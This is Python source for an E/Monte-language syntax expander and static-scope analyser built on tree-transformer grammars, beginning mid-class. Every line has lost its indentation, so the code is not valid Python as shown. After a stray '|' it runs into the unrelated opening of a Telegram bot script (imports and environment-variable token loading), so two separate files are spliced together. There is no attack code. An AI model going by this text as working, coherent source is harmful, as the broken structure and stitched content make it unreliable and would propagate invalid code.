namesRead = ScopeSet()
if namesSet is None:
namesSet = ScopeSet()
if defNames is None:
defNames = ScopeSet()
if varNames is None:
varNames = ScopeSet()
self.namesRead = ScopeSet(namesRead)
self.namesSet = ScopeSet(namesSet)
self.defNames = ScopeSet(defNames)
self.varNames = ScopeSet(varNames)
self.metaStateExprFlag = metaStateExprFlag
def hide(self):
return StaticScope(self.namesRead, self.namesSet,
self.metaStateExprFlag,
None, None)
def add(self, right):
"""
For processing normal expressions left to right, where all definitions
are exported, but uses are hidden by definitions to their left.
"""
if right is None:
return self
rightNamesRead = (right.namesRead - self.defNames) - self.varNames
rightNamesSet = (right.namesSet - self.varNames)
badAssigns = rightNamesSet & self.defNames
if badAssigns:
if len(badAssigns) == 1:
raise ValueError("Can't assign to final noun %r" % tuple(badAssigns))
else:
raise ValueError("Can't assign to final nouns %s" % ', '.join(badAssigns))
#rightNamesSet = rightNamesSet - badAssigns
return StaticScope(self.namesRead | rightNamesRead,
self.namesSet | rightNamesSet,
self.metaStateExprFlag or right.metaStateExprFlag,
self.defNames | right.defNames,
self.varNames | right.varNames)
def namesUsed(self):
"""
What are the names of variables used by this expression that refer to
variables defined outside this expression?
Union of namesRead and namesSet.
"""
return self.namesRead | self.namesSet
def outNames(self):
"""
What variables are defined in this expression that are visible after
this expression (i.e., to its right)?
Union of defNames and varNames.
"""
return self.defNames | self.varNames
def __repr__(self):
return "<%r := %r =~ %r + var %r %s>" % (list(self.namesSet),
list(self.namesRead),
list(self.defNames),
list(self.varNames),
("meta.getState()"
if self.metaStateExprFlag
else ""))
def getExports(scope, used):
outs = scope.outNames()
if used is not None and not used.metaStateExprFlag:
outs = outs & used.namesUsed()
return outs
def union(scopes, result=StaticScope()):
for sc in scopes:
if sc and not isinstance(sc, list):
result = result.add(sc)
return result
def foldr(f, a, bs):
for b in bs:
a = f(a, b)
return a
def verbAssignError(parser, target):
name = target.tag.name
if name == "QuasiLiteralExpr":
err("Can't use update-assign syntax on a \"$\"-hole. "
"Use explicit \":=\" syntax instead.", parser)
elif name == "QuasiPatternExpr":
err("Can't use update-assign syntax on a \"@\"-hole. "
"Use explicit \":=\" syntax instead.", parser)
else:
err("Can only update-assign nouns and calls", parser)
def err(msg, parser):
raise parser.input.error.withMessage([("message", msg)])
def expandCallVerbAssign(self, verb, args, receiver, methVerb, methArgs):
r = self.mktemp("recip")
prelude = t.Def(t.FinalPattern(r, None), None, receiver)
seq = [prelude]
setArgs = []
for arg in methArgs.args:
a = self.mktemp("arg")
seq.append(t.Def(t.FinalPattern(a, None), None, arg))
setArgs.append(a)
seq.extend(self.apply("transform", [t.Assign(t.MethodCallExpr(r, methVerb, setArgs), t.MethodCallExpr(t.MethodCallExpr(r, methVerb, setArgs), verb, args))])[0][0].args[0].args)
return t.SeqExpr(seq)
def expandDef(self, patt, optEj, rval, nouns):
pattScope = scope(patt)
defPatts = pattScope.defNames
varPatts = pattScope.varNames
rvalScope = scope(rval)
if optEj:
rvalScope = scope(optEj).add(rvalScope)
rvalUsed = rvalScope.namesUsed()
if len(varPatts & rvalUsed) != 0:
err("Circular 'var' definition not allowed", self)
if len(pattScope.namesUsed() & rvalScope.outNames()) != 0:
err("Pattern may not use var defined on the right", self)
conflicts = defPatts & rvalUsed
if len(conflicts) == 0:
return t.Def(patt, optEj, rval)
else:
promises = []
resolves = []
renamings = {}
for oldNameStr in conflicts.getKeys():
newName = self.mktemp(oldNameStr)
newNameR = self.mktemp(oldNameStr + "R")
renamings[oldNameStr] = newName
# def [newName, newNameR] := Ref.promise()
pair = [t.FinalPattern(newName, None),
t.FinalPattern(newNameR, None)]
promises.append(t.Def(t.ListPattern(pair, None), None,
mcall("Ref", "promise")))
resolves.append(t.MethodCallExpr(newNameR, "resolve",
[t.NounExpr(oldNameStr)]))
resName = self.mktemp("value")
resolves.append(resName)
cr = CycleRenamer([rval])
cr.renamings = renamings
rval = cr.apply("transform")[0]
resPatt = t.FinalPattern(resName, None)
resDef = t.Def(resPatt, None, t.Def(patt, optEj, rval))
return t.SeqExpr(promises + [resDef] + resolves)
computeStaticScopeRules = """
null = anything:t ?(t is None or t.tag.name == 'null') -> StaticScope()
LiteralExpr(:val) -> StaticScope()
NounExpr(@name) -> StaticScope(namesRead=[name])
TempNounExpr(@name @idx) -> StaticScope(namesRead=[name + str(idx)])
SlotExpr(@name) -> StaticScope(namesRead=[name])
BindingExpr(@b) -> b
HideExpr(@blockScope) -> blockScope.hide()
Meta("Context") -> StaticScope()
Meta("State") -> StaticScope(metaStateExprFlag=True)
SeqExpr(@scopes) -> union(scopes)
Module(@imports @exports :body) -> union(imports).add(union(exports))
MethodCallExpr(@receiverScope :verb @argScopes) -> union(argScopes, receiverScope)
Def(@patternScope @exitScope @exprScope) -> patternScope.add(exitScope).add(exprScope)
Assign(NounExpr(@name) @rightScope) -> StaticScope(namesSet=[name]).add(rightScope)
Assign(TempNounExpr(@name @idx) @rightScope) -> StaticScope(namesSet=[name + str(idx)]).add(rightScope)
IgnorePattern(@guardScope) -> guardScope or StaticScope()
VarPattern(NounExpr(@name) @guardScope) -> StaticScope(varNames=[name]).add(guardScope)
VarPattern(TempNounExpr(@name @idx) @guardScope) -> StaticScope(varNames=[name + str(idx)]).add(guardScope)
FinalPattern(NounExpr(@name) @guardScope) -> StaticScope(defNames=[name]).add(guardScope)
FinalPattern(TempNounExpr(@name @idx) @guardScope) -> StaticScope(defNames=[name + str(idx)]).add(guardScope)
SlotPattern(NounExpr(@name) @guardScope) -> StaticScope(varNames=[name]).add(guardScope)
BindingPattern(NounExpr(@name)) -> StaticScope(varNames=[name])
BindingPattern(TempNounExpr(@name @idx)) -> StaticScope(varNames=[name + str(idx)])
ListPattern(@patternScopes null) -> union(patternScopes)
ViaPattern(@exprScope @patternScope) -> exprScope.add(patternScope)
Script(@extends @methodScopes @matcherScopes) -> union(methodScopes + matcherScopes)
Object(@doco @nameScope @auditorScope @scriptScope) -> nameScope.add(union(auditorScope).add(scriptScope))
Method(@doco @verb @paramsScope @guardScope @blockScope) -> union(paramsScope + [(guardScope or StaticScope()), blockScope.hide()]).hide()
Matcher(@patternScope @blockScope) -> patternScope.add(blockScope).hide()
If(@testScope @consqScope @altScope) -> testScope.add(consqScope).hide().add(altScope).hide()
KernelTry(@tryScope @patternScope @catchScope) -> tryScope.hide().add(patternScope.add(catchScope)).hide()
Finally(@tryScope @finallyScope) -> tryScope.hide().add(finallyScope).hide()
Escape(@ejScope @bodyScope null null) -> ejScope.add(bodyScope).hide()
Escape(@ejScope @bodyScope @argScope @catcherScope) -> ejScope.add(bodyScope).hide().add(argScope.add(catcherScope)).hide()
MatchBind(@specimen @pattern) -> specimen.add(pattern)
LogicalAnd(delayed:left delayed:right) -> self.expandAndScope(left).add(self.expandAndScope(right))
LogicalAnd(delayed:left @rightScope) -> self.expandAndScope(left).add(right)
LogicalAnd(@leftScope delayed:right) -> leftScope.add(self.expandAndScope(right))
LogicalAnd(@leftScope @rightScope) -> leftScope.add(rightScope)
LogicalOr(expand:left expand:right) -> StaticScope(left.namesRead | right.namesRead,
left.namesSet | right.namesSet,
left.metaStateExprFlag or right.metaStateExprFlag,
left.defNames | right.defNames,
left.varNames | right.varNames)
"""
def scope(term):
x = StaticScopeTransformer.transform(term)[0]
if x is None:
return StaticScope()
return x
def mcall(noun, verb, *expr):
return t.MethodCallExpr(t.NounExpr(noun), verb, expr)
def putVerb(verb):
if verb == "get":
return "put"
elif verb == "run":
return "setRun"
elif verb.startswith("get"):
return "set"+verb[3:]
elif verb.startswith("__get"):
return "__set"+verb[5:]
def buildQuasi(name, pairs):
textParts = []
exprParts = []
patternParts = []
for text, expr, patt in pairs:
if expr:
textParts.append(t.MethodCallExpr(
t.NounExpr(name + "__quasiParser"),
"valueHole",
[t.LiteralExpr(len(exprParts))]))
exprParts.append(expr)
elif patt:
textParts.append(t.MethodCallExpr(
t.NounExpr(name + "__quasiParser"),
"patternHole",
[t.LiteralExpr(len(patternParts))]))
patternParts.append(patt)
else:
textParts.append(t.LiteralExpr(text.data))
return textParts, exprParts, patternParts
#implicit rules:
# data transforms to itself
# tuples transform to tuples with each item transformed
# other terms transform to terms of the same name with each arg transformed
expander = """
#no args and lowercase means this isn't automatically treated as a
#term, so we explicitly deal with it here
null = anything:t ?(t is None or t.tag.name == 'null')
nameAndString = NounExpr(:name):e !(self.nouns.add(name)) -> e, name.data
| SlotExpr(NounExpr(:name)):e -> e, '&' + name.data
| BindingExpr(NounExpr(:name)):e -> e, '&&' + name.data
| VarPattern(name:name :guard):p transform(p):e -> e, name
| BindPattern(name:name :guard):p transform(p):e -> e, name
| FinalPattern(name:name :guard):p transform(p):e -> e, name
| SlotPattern(name:name :guard):p transform(p):e -> e, '&' + name
| BindingPattern(name:name):p transform(p):e -> e, '&&' + name
name = NounExpr(:name) !(self.nouns.add(name)) -> name.data
| SlotExpr(:name) -> '&' + name.data
| BindingExpr(NounExpr(:name)) -> '&&' + name.data
NounExpr(@name) !(self.nouns.add(name)) -> t.NounExpr(name)
URIExpr(@scheme @body) -> mcall(scheme + "__uriGetter", "get", t.LiteralExpr(body))
URIGetter(@scheme) -> t.NounExpr(scheme + "__uriGetter")
MapExpr(@assocs) -> mcall("__makeMap", "fromPairs", mcall("__makeList", "run", *[mcall("__makeList", "run", *a) for a in assocs]))
MapExprAssoc(@key @value) -> [key, value]
MapExprExport(nameAndString:pair) -> [t.LiteralExpr(pair[1]), pair[0]]
ListExpr(@items) -> mcall("__makeList", "run", *items)
QuasiExpr(null [qexpr("simple"):qs]) -> t.MethodCallExpr(mcall("simple__quasiParser", "valueMaker", mcall("__makeList", "run", *qs[0])), "substitute", [mcall("__makeList", "run", *qs[1])])
QuasiExpr(@name [qexpr(name):qs]) -> t.MethodCallExpr(mcall(name + "__quasiParser", "valueMaker", mcall("__makeList", "run", *qs[0])), "substitute", [mcall("__makeList", "run", *qs[1])])
qexpr :name = (qtext | qehole)*:pairs -> buildQuasi(name, pairs)
qpatt :name = (qtext | qehole | qphole)*:pairs -> buildQuasi(name, pairs)
qtext = QuasiText(:text) -> (text, None, None)
qehole = QuasiExprHole(@expr) -> (None, expr, None)
qphole = QuasiPatternHole(@patt) -> (None, None, patt)
Module(@imports :exports @expr) -> t.Module(imports, exports, expr)
SeqExpr([]) -> None
SeqExpr(@exprs) -> t.SeqExpr(flattenSeqs(exprs))
VerbCurryExpr(@receiver :verb) -> mcall("__makeVerbFacet", "curryCall", receiver, t.LiteralExpr(verb))
GetExpr(@receiver @index) -> t.MethodCallExpr(receiver, "get", index)
FunctionCallExpr(@receiver @args) -> t.MethodCallExpr(receiver, "run", args)
FunctionSendExpr(@receiver @args) -> mcall("M", "send", receiver, t.LiteralExpr("run"), args)
MethodSendExpr(@receiver :verb @args) -> mcall("M", "send", receiver, t.LiteralExpr(verb), mcall("__makeList", "run", *args))
SendCurryExpr(@receiver :verb) -> mcall("__makeVerbFacet", "currySend", receiver, t.LiteralExpr(verb))
Minus(@receiver) -> t.MethodCallExpr(receiver, "negate", [])
LogicalNot(@receiver) -> t.MethodCallExpr(receiver, "not", [])
BinaryNot(@receiver) -> t.MethodCallExpr(receiver, "complement", [])
Pow(@left @right) -> binop("pow", left, right)
Multiply(@left @right) -> binop("multiply", left, right)
Divide(@left @right) -> binop("approxDivide", left, right)
FloorDivide(@left @right) -> binop("floorDivide", left, right)
Mod(Pow(@x @y) @z) -> t.MethodCallExpr(x, "modPow", [y, z])
Mod(MethodCallExpr(@x "pow" [@y]) @z) -> t.MethodCallExpr(x, "modPow", [y, z])
Mod(@left @right) -> binop("mod", left, right)
Add(@left @right) -> binop("add", left, right)
Subtract(@left @right) -> binop("subtract", left, right)
ShiftRight(@left @right) -> binop("shiftRight", left, right)
ShiftLeft(@left @right) -> binop("shiftLeft", left, right)
Till(@left @right) -> mcall("__makeOrderedSpace", "op__till", left, right)
Thru(@left @right) -> mcall("__makeOrderedSpace", "op__thru", left, right)
GreaterThan(@left @right) -> mcall("__comparer", "greaterThan", left, right)
GreaterThanEqual(@left @right) -> mcall("__comparer", "geq", left, right)
AsBigAs(@left @right) -> mcall("__comparer", "asBigAs", left, right)
LessThanEqual(@left @right) -> mcall("__comparer", "leq", left, right)
LessThan(@left @right) -> mcall("__comparer", "lessThan", left, right)
Coerce(@spec @guard) -> t.MethodCallExpr(mcall("ValueGuard", "coerce", guard, t.NounExpr("throw")), "coerce", [spec, t.NounExpr("throw")])
MatchBind(@spec @patt) -> expandMatchBind(self, spec, patt)
Mismatch(@spec @patt) -> t.MethodCallExpr(expandMatchBind(self, spec, patt), "not", [])
Same(@left @right) -> mcall("__equalizer", "sameEver", left, right)
NotSame(@left @right) -> t.MethodCallExpr(mcall("__equalizer", "sameEver", left, right), "not", [])
ButNot(@left @right) -> binop("butNot", left, right)
BinaryOr(@left @right) -> binop("or", left, right)
BinaryAnd(@left @right) -> binop("and", left, right)
BinaryXor(@left @right) -> binop("xor", left, right)
LogicalAnd(@left @right) -> expandLogical(self, left, right, expandAnd)
LogicalOr(@left @right) -> expandLogical(self, left, right, expandOr)
Def(@pattern @exit @expr) -> expandDef(self, pattern, exit, expr, self.nouns)
Forward(@name) !(t.NounExpr(name.args[0].data + "__Resolver")):rname -> t.SeqExpr([
t.Def(t.ListPattern([
t.FinalPattern(name, None),
t.FinalPattern(rname, None)],
None),
None,
mcall("Ref", "promise")),
rname])
Assign(@left @right) = ass(left right)
ass NounExpr(:name) :right -> t.Assign(t.NounExpr(name), right)
ass MethodCallExpr(@receiver @verb @args):left :right !(self.mktemp("ares")):ares -> t.SeqExpr([t.MethodCallExpr(receiver, putVerb(verb), args + [t.Def(t.FinalPattern(ares, None), None, right)]), ares])
ass :left :right -> err("Assignment can only be done to nouns and collection elements", self)
VerbAssign(:verb @target @args) = vass(verb target args)
vass :verb NounExpr(@name) :args -> t.Assign(t.NounExpr(name), mcall(name, verb, *args))
vass :verb MethodCallExpr(@receiver :methVerb :methArgs) :args -> expandCallVerbAssign(self, verb, args, receiver, methVerb, methArgs)
vass :verb :badTarget :args -> verbAssignError(self, badTarget)
AugAssign(@op @left @right) = vass(binops[op] left [right])
Break(null) -> mcall("__break", "run")
Break(@expr) -> mcall("__break", "run", expr)
Continue(null) -> mcall("__continue", "run")
Continue(@expr) -> mcall("__continue", "run", expr)
Return(null) -> mcall("__return", "run")
Return(@expr) -> mcall("__return", "run", expr)
Guard(@expr @subscripts) -> reduce(lambda e, s: t.MethodCallExpr(e, "get", s), subscripts, expr)
#IgnorePattern(@guard) -> t.IgnorePattern(guard)
SamePattern(@value) -> t.ViaPattern(mcall("__matchSame", "run", value), t.IgnorePattern(None))
NotSamePattern(@value) -> t.ViaPattern(mcall("__matchSame", "different", value), t.IgnorePattern(None))
VarPattern(@name @guard) = -> t.VarPattern(name, guard)
BindPattern(@name @guard) -> t.ViaPattern(mcall("__bind", "run", t.NounExpr(name.args[0].data + "__Resolver"), guard), t.IgnorePattern(None))
#FinalPattern(@name @guard) -> t.FinalPattern(name, guard)
SlotExpr(@name) -> slot(name)
SlotPattern(@name null) -> t.ViaPattern(t.NounExpr("__slotToBinding"), t.BindingPattern(name))
SlotPattern(@name @guard) -> t.ViaPattern(t.MethodCallExpr(t.NounExpr("__slotToBinding"), "run", [guard]), t.BindingPattern(name))
MapPattern(@assocs @tail) -> foldr(lambda more, (l, r): t.ViaPattern(l, t.ListPattern([r, more], None)),
tail or t.IgnorePattern(t.NounExpr("__mapEmpty")),
reversed(assocs))
MapPatternAssoc(@key @value) -> [key, value]
MapPatternImport(nameAndString:nameAnd) -> [t.LiteralExpr(nameAnd[1]), nameAnd[0]]
MapPatternOptional(@assoc @default) -> [mcall("__mapExtract", "depr", assoc[0], default), assoc[1]]
MapPatternRequired(@assoc) -> (mcall("__mapExtract", "run", assoc[0]), assoc[1])
ListPattern(@patterns null) -> t.ListPattern(patterns, None)
ListPattern(@patterns @tail) -> t.ViaPattern(mcall("__splitList", "run", t.LiteralExpr(len(patterns))), t.ListPattern(patterns + [tail], None))
SuchThatPattern(@pattern @expr) -> t.ViaPattern(t.NounExpr("__suchThat"),
t.ListPattern([pattern, t.ViaPattern(mcall("__suchThat", "run", expr), t.IgnorePattern(None))], None))
QuasiPattern(null [qpatt("simple"):qs]) -> t.ViaPattern(mcall("__quasiMatcher", "run", mcall("simple__quasiParser", "matchMaker", mcall("__makeList", "run", *qs[0])), mcall("__makeList", "run", *qs[1])), t.ListPattern(qs[2], None))
QuasiPattern(@name [qpatt(name):qs]) -> t.ViaPattern(mcall("__quasiMatcher", "run", mcall(name + "__quasiParser", "matchMaker", mcall("__makeList", "run", *qs[0])), mcall("__makeList", "run", *qs[1])), t.ListPattern(qs[2], None))
Interface(@doco nameAndString:nameAnd @guard @extends @implements
InterfaceFunction(:params :resultGuard))
-> expandInterface(doco, nameAnd[0], nameAnd[1], guard, extends,
implements,
[self.transform(t.MessageDesc("", "to", "run",
params, resultGuard))])
Interface(@doco nameAndString:nameAnd @guard @extends @implements @script)
-> expandInterface(doco, nameAnd[0], nameAnd[1], guard, extends,
implements, script)
MessageDesc(@doco @type @verb @paramDescs @guard)
-> t.HideExpr(mcall("__makeMessageDesc", "run",
doco and t.LiteralExpr(doco), t.LiteralExpr(verb),
mcall("__makeList", "run", *paramDescs),
guard or t.NounExpr("void")))
ParamDesc(name:name @guard) -> mcall("__makeParamDesc", "run", t.LiteralExpr(name), guard or t.NounExpr("any"))
Lambda(@doco @patterns @block) -> t.Object(doco, t.IgnorePattern(None), [None],
t.Script(None,
[t.Method(None, "run", patterns,
None, block)],
[]))
Object(:doco BindPattern(:name :guard):bp :auditors :script):o transform(bp):exName
transform(t.Object(doco, t.FinalPattern(name, None), auditors, script)):exObj
-> t.Def(exName, None, t.HideExpr(exObj))
Object(@doco @name @auditors Function(@params @guard @block))
-> t.Object(doco, name, auditors, t.Script(None,
[t.Method(doco, "run", params, guard,
t.Escape(t.FinalPattern(t.NounExpr("__return"), None),
t.SeqExpr([block, t.NounExpr("null")]), None, None))],
[]))
Object(@doco @name @auditors Script(null @methods @matchers)) -> t.Object(doco, name, auditors, t.Script(None, methods, matchers))
Object(@doco VarPattern(@name @guard):vp @auditors Script(@extends @methods @matchers)) transform(vp):exVP
objectSuper(doco exVP auditors extends methods matchers [slot(t.NounExpr(name))]):o
-> t.SeqExpr([t.Def(slotpatt(name), None, o), name])
Object(@doco @name @auditors Script(@extends @methods @matchers)) =
objectSuper(doco name auditors extends methods matchers []):o -> t.Def(name, None, o)
objectSuper :doco :name :auditors NounExpr(@extends) :methods :matchers :maybeSlot !(self.mktemp("pair")):p -> t.HideExpr(t.SeqExpr([
t.Def(t.BindingPattern(t.NounExpr("super")),
None, t.BindingExpr(t.NounExpr(extends))),
t.Object(doco, name, auditors,
t.Script(None, methods,
matchers + [t.Matcher(t.FinalPattern(p, None),
mcall("M", "callWithPair", t.NounExpr("super"), p))]))
] + maybeSlot))
objectSuper :doco :name :auditors :extends :methods :matchers :maybeSlot !(self.mktemp("pair")):p -> t.HideExpr(t.SeqExpr([
t.Def(t.FinalPattern(t.NounExpr("super"), None),
None, extends),
t.Object(doco, name, auditors,
t.Script(None, methods,
matchers + [t.Matcher(t.FinalPattern(p, None),
mcall("M", "callWithPair", t.NounExpr("super"), p))]))
] + maybeSlot))
To(:doco @verb @params @guard @block) -> t.Method(doco, verb, params, guard, t.Escape(t.FinalPattern(t.NounExpr("__return"), None),
t.SeqExpr([block, t.NounExpr("null")]), None, None))
For(:key :value @coll @block @catcher)
-> expandFor(self, key, value, coll, block, catcher)
ListComp(@key @value @iterable @filter @exp) -> expandComprehension(self, key,
value, iterable, filter, exp,
"__accumulateList")
MapComp(@key @value @iterable @filter @kexp @vexp) -> expandComprehension(self, key,
value, iterable, filter,
mcall("__makeList", "run", kexp, vexp),
"__accumulateMap")
Switch(@expr @matchers) -> expandSwitch(self, expr, matchers)
Try(@tryblock [] null) -> t.HideExpr(tryblock)
Try(@tryblock [(Catch(@p @b) -> (p, b))*:cs] @finallyblock) kerneltry(expandTryCatch(tryblock, cs) finallyblock)
kerneltry :tryexpr null -> tryexpr
kerneltry :tryexpr :finallyexpr -> t.Finally(tryexpr, finallyexpr)
While(@test @block @catcher) = expandWhile(test block catcher)
expandWhile :test :block :catcher -> t.Escape(t.FinalPattern(t.NounExpr("__break"), None), mcall("__loop", "run", mcall("__iterWhile", "run", t.Object(None, t.IgnorePattern(None), [None], t.Script(None, [t.Method(None, "run", [], None, test)], []))), t.Object("While loop body", t.IgnorePattern(None), [None], t.Script(None, [t.Method(None, "run", [t.IgnorePattern(None), t.IgnorePattern(None)], t.NounExpr("Bool"), t.SeqExpr([t.Escape(t.FinalPattern(t.NounExpr("__continue"), None), block, None, None), t.NounExpr("true")]))], []))), *catcher)
When([@arg] @block :catchers @finallyblock) expandWhen(arg block catchers finallyblock)
When(@args @block :catchers :finallyblock) expandWhen(mcall("promiseAllFulfilled", "run", t.MethodCallExpr(t.NounExpr("__makeList"), "run", args)) block catchers finallyblock)
expandWhen :arg :block [([@p @b] -> (p, b))*:catchers] :finallyblock !(self.mktemp("resolution")):resolution kerneltry(expandTryCatch(t.If(mcall("Ref", "isBroken", resolution), mcall("Ref", "broken", mcall("Ref", "optProblem", resolution)), block), catchers) finallyblock):body -> t.HideExpr(mcall("Ref", "whenResolved", arg, t.Object("when-catch 'done' function", t.IgnorePattern(None), [None], t.Script(None, [t.Method(None, "run", [t.FinalPattern(resolution, None)], None, body)], []))))
"""
def flattenSeqs(xs):
items = []
for x in xs:
if x.tag.name == 'SeqExpr' and x.args:
items.extend(x.args[0].args)
else:
items.append(x)
return items
def expandSwitch(self, expr, matchers):
sp = self.mktemp("specimen")
failures = [self.mktemp("failure") for _ in matchers]
return t.HideExpr(t.SeqExpr([
t.Def(t.FinalPattern(sp, None),
None, expr),
matchExpr(self, matchers, sp, failures)]))
def matchExpr(self, matchers, sp, failures):
ejs = [self.mktemp("ej") for _ in matchers]
block = mcall("__switchFailed", "run", sp, *failures)
for m, fail, ej in reversed(zip(matchers, failures, ejs)):
block = t.Escape(
t.FinalPattern(ej, None),
t.SeqExpr([
t.Def(m.args[0], ej, sp),
m.args[1]]),
t.FinalPattern(fail, None),
block)
return block
def expandTryCatch(tryblock, catchers):
block = tryblock
for (patt, catchblock) in catchers:
block = t.KernelTry(block, patt, catchblock)
return block
def binop(name, left, right):
return t.MethodCallExpr(left, name, [right])
def expandLogical(self, left, right, fn):
leftmap = scope(left).outNames()
rightmap = scope(right).outNames()
both = [t.NounExpr(n) for n in leftmap | rightmap]
result = self.mktemp("ok")
success = t.MethodCallExpr(t.NounExpr("__makeList"), "run",
[TRUE] + [t.BindingExpr(n) for n in both])
failure = t.MethodCallExpr(t.NounExpr("__booleanFlow"), "failureList", [t.LiteralExpr(len(both))])
return t.SeqExpr([
t.Def(t.ListPattern([t.FinalPattern(result, None)] +
[t.BindingPattern(n) for n in both], None),
None,
fn(left, right, success, failure, leftmap, rightmap)),
result])
def expandAnd(left, right, success, failure, leftmap, rightmap):
return t.If(left, t.If(right, success, failure), failure)
def expandOr(left, right, success, failure, leftmap, rightmap):
broken = mcall("__booleanFlow", "broken")
def partialFail(failed):
return t.SeqExpr([t.Def(t.BindingPattern(n), None, broken) for n in failed] + [success])
rightOnly = [t.NounExpr(n) for n in rightmap - leftmap]
leftOnly = [t.NounExpr(n) for n in leftmap - rightmap]
return t.If(left, partialFail(rightOnly), t.If(right, partialFail(leftOnly), failure))
def expandInterface(doco, name, nameStr, guard, extends, implements, script):
def makeIFace(verb):
return t.HideExpr(
mcall("__makeProtocolDesc", verb, doco and t.LiteralExpr(doco),
t.MethodCallExpr(
t.MethodCallExpr(t.Meta("Context"), "getFQNPrefix", []),
"add", [t.LiteralExpr(nameStr + "__T")]),
mcall("__makeList", "run", *extends),
mcall("__makeList", "run", *implements),
mcall("__makeList", "run", *script)))
if guard:
return t.MethodCallExpr(
t.Def(t.ListPattern([name, guard], None), None, makeIFace("makePair")),
"get", [t.LiteralExpr(0)])
else:
return t.Def(name, None, makeIFace("run"))
def validateFor(self, left, right):
if left.outNames() & right.namesUsed():
err("Use on right isn't really in scope of definition", self)
if right.outNames() & left.namesUsed():
err("Use on left would get captured by definition on right", self)
def expandFor(self, key, value, coll, block, catcher):
if key.tag.name == "null":
key = t.IgnorePattern(None)
validateFor(self, scope(key).add(scope(value)), scope(coll))
fTemp = self.mktemp("validFlag")
kTemp = self.mktemp("key")
vTemp = self.mktemp("value")
obj = t.Object(
"For-loop body", t.IgnorePattern(None),
[None],
t.Script(
None,
[t.Method(None, "run",
[t.FinalPattern(kTemp, None),
t.FinalPattern(vTemp, None)],
None,
t.SeqExpr([
mcall("__validateFor", "run", fTemp),
t.Escape(
t.FinalPattern(t.NounExpr("__continue"), None),
t.SeqExpr([
t.Def(key, None, kTemp),
t.Def(value, None, vTemp),
block,
t.NounExpr("null")]),
None,
None)]))],
[]))
return t.Escape(
t.FinalPattern(t.NounExpr("__break"), None),
t.SeqExpr([t.Def(
t.VarPattern(fTemp, None), None,
t.NounExpr("true")),
t.Finally(
t.MethodCallExpr(
t.NounExpr("__loop"),
"run",
[coll, obj]),
t.Assign(fTemp, t.NounExpr("false"))),
t.NounExpr("null")]),
*catcher)
def expandComprehension(self, key, value, coll, filtr, exp, collector):
if key is None:
key = t.IgnorePattern(None)
validateFor(self, scope(exp), scope(coll))
validateFor(self, scope(key).add(scope(value)), scope(coll))
fTemp = self.mktemp("validFlag")
kTemp = self.mktemp("key")
vTemp = self.mktemp("value")
skip = self.mktemp("skip")
kv = [t.Def(key, None, kTemp), t.Def(value, None, vTemp)]
if filtr:
value = t.SeqExpr(kv + [t.If(filtr, exp, t.MethodCallExpr(skip, "run", []))])
else:
value = t.SeqExpr(kv + [exp])
obj = t.Object(
"For-loop body", t.IgnorePattern(None),
[None],
t.Script(
None,
[t.Method(None, "run",
[t.FinalPattern(kTemp, None),
t.FinalPattern(vTemp, None),
t.FinalPattern(skip, None)],
None,
t.SeqExpr([
mcall("__validateFor", "run", fTemp),
value]))],
[]))
return t.SeqExpr([
t.Def(
t.VarPattern(fTemp, None), None,
t.NounExpr("true")),
t.Finally(
t.MethodCallExpr(
t.NounExpr(collector),
"run",
[coll, obj]),
t.Assign(fTemp, t.NounExpr("false")))])
def expandMatchBind(self, spec, patt):
pattScope = scope(patt)
specScope = scope(spec)
conflicts = pattScope.outNames() & specScope.namesUsed()
if conflicts:
err("Use on left isn't really in scope of matchbind pattern: %s" %
(', '.join(conflicts)), self)
sp = self.mktemp("sp")
ejector = self.mktemp("fail")
result = self.mktemp("ok")
problem = self.mktemp("problem")
broken = self.mktemp("b")
patternNouns = [t.NounExpr(n) for n in pattScope.outNames()]
return t.SeqExpr([
t.Def(t.FinalPattern(sp, None), None, spec),
t.Def(
t.ListPattern([t.FinalPattern(result, None)] +
[t.BindingPattern(n) for n in patternNouns], None),
None,
t.Escape(
t.FinalPattern(ejector, None),
t.SeqExpr([
t.Def(patt, ejector, sp),
mcall("__makeList", "run",
TRUE, *[t.BindingExpr(n) for n in patternNouns])]),
t.FinalPattern(problem, None),
t.SeqExpr([
t.Def(slotpatt(broken), None,
mcall("Ref", "broken", problem)),
mcall("__makeList", "run",
FALSE, *([t.BindingExpr(broken)] * len(patternNouns)))]))),
result])
def broke(br, ex):
return t.Def(t.FinalPattern(br, None),
mcall("Ref", "broken", mcall("__makeList", "run", ex)))
def slot(n):
return t.MethodCallExpr(t.BindingExpr(n), 'get', [])
def slotpatt(n):
return t.ViaPattern(t.NounExpr("__slotToBinding"), t.BindingPattern(n))
binops = {
"Add": "add",
"Subtract": "subtract",
"Multiply": "multiply",
"Divide": "approxDivide",
"Mod": "mod",
"Pow": "pow",
"FloorDivide": "floorDivide",
"ShiftRight": "shiftRight",
"ShiftLeft": "shiftLeft",
"BinaryAnd": "and",
"BinaryOr": "or",
"BinaryXor": "xor",
"ButNot": "butNot"
}
reifier = r"""
TempNounExpr(@basename @o) -> reifyNoun(self, basename, o)
"""
def reifyNoun(self, base, o):
k = (base, o)
if k in self.cache:
return self.cache[k]
self.id += 1
noun = "%s__%s" % (base, self.id)
while noun in self.nouns:
self.id += 1
noun = "%s__%s" % (base, self.id)
self.nouns.add(noun)
n = t.NounExpr(noun)
self.cache[k] = n
return n
cycleRenamer = r"""
NounExpr(@name) (?(name in self.renamings) -> self.renamings[name]
| -> t.NounExpr(name))
"""
def expand(term, scope=None):
e = Expander([term])
e.scope = scope
e.nouns = set()
e.counter = 0
expanded = e.apply("transform")[0]
r = Reifier([expanded])
r.nouns = set(e.nouns)
r.cache = {}
r.id = 0
reified = r.apply("transform")[0]
return reified
def mktemp(self, name):
self.counter += 1
return t.TempNounExpr(name, self.counter)
StaticScopeTransformer = TreeTransformerGrammar.makeGrammar(computeStaticScopeRules, "StaticScopeTransformer").createParserClass(TreeTransformerBase, globals())
Expander = TreeTransformerGrammar.makeGrammar(expander, name="EExpander").createParserClass(TreeTransformerBase, globals())
Expander.mktemp = mktemp
Reifier = TreeTransformerGrammar.makeGrammar(reifier, name="Reifier").createParserClass(TreeTransformerBase, globals())
CycleRenamer = TreeTransformerGrammar.makeGrammar(cycleRenamer, name="CycleRenamer").createParserClass(TreeTransformerBase, globals())
|
# -*- coding: utf-8 -*-
import json, os, requests
from dotenv import load_dotenv
from telegram import Bot, InlineKeyboardButton, InlineKeyboardMarkup, Update
from telegram.ext import (CallbackContext, CallbackQueryHandler,
CommandHandler, Filters, MessageHandler, Updater)
load_dotenv()
TELEGRAM_TOKEN = os.getenv('TELEGRAM_TOKEN')
CHAT_ID = os.getenv('TELEGRAM_CHAT_ID')
